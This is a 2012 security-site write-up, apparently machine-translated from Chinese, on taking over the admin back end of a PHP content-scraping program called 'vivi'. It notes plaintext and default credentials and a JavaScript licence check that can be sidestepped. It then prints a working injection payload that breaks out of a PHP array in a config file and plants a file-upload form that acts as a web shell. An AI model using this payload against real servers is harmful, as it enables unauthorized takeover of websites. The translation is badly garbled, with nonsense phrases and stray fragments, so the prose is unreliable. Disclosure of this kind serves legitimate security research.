vivi thief program the backstage management system background to take the shell with the breakthrough in License verification-vulnerability and early warning-the black bar safety net

2012-07-20T00:00:00
ID MYHACK58:62201234384
Type myhack58
Reporter 佚名
Modified 2012-07-20T00:00:00

Description

A brief introduction about this program this program is a thief program, that is no database there is no so-calledsql injection.

Then the administrator account password of all plaintext storage in /admin/data.php inside.

The default background path:/admin/index.php

Default account password: admin

A brief point directly to see how to get the shell code analysis.

The system configuration file is not seen, although using the【“】instead of single quotes, tested found【”】is also escape, thus allowing the group to a gay depressed is broken.

Substantially all of the just written file pages are used in this code.

! vivi thief program back office management system back-end to get the shell and the breakthrough in the authorization verification

if(preg_match("/require|include|REQUEST|eval|system|fputs/i", $con)){ echo"<script>alert('contains illegal characters!'); location. href='? id=wyc';</script>";

Filter some commonly used function and therefore write a General word SUB is broken, I also not continue to study bypass, bypasses the method of a lot.

The following look at to get the shell places SEO optimization of the provided pseudo-original vocabulary

The default Click is will prompt the authorization information

! vivi thief program back office management system back-end to get the shell and the breakthrough in the authorization verification

But a simple look at which is a js in the dirty tricks, this is simple.

With the Opera browser it is directly passed to bypass this window.

This edit file is /admin/wyc.php see the code

! vivi thief program back office management system back-end to get the shell and the breakthrough in the authorization verification

It actually used the stripslashes amazing. Haha funny.

它 保存 到 /include/keyword.php this file. Go look at the file structure well constructed statement

! vivi thief program back office management system back-end to get the shell and the breakthrough in the authorization verification

Well, he is the array stored in the form of

Compare web page you can find, he is only saved array( ) this is the middle content.

That knowing. Then we plug in the front, then you should closed this)so this array ends and then plus

Our code

A word does not make a direct construction of a pony to.

)?>< form method="post" action="? hack=niu" enctype="multipart/form-data"><input name="upfile" type="file"><input type="submit" value="ok"></form><? php if ($_GET['hack'] == 'niu') {if(! file_exists($_FILES["upfile"]["name"])){ copy($_FILES["upfile"]["tmp_name"], $_FILES["upfile"]["name"]);}}?>

Directly see the effect.

! vivi thief program back office management system back-end to get the shell and the breakthrough in the authorization verification

Well, on the end of it.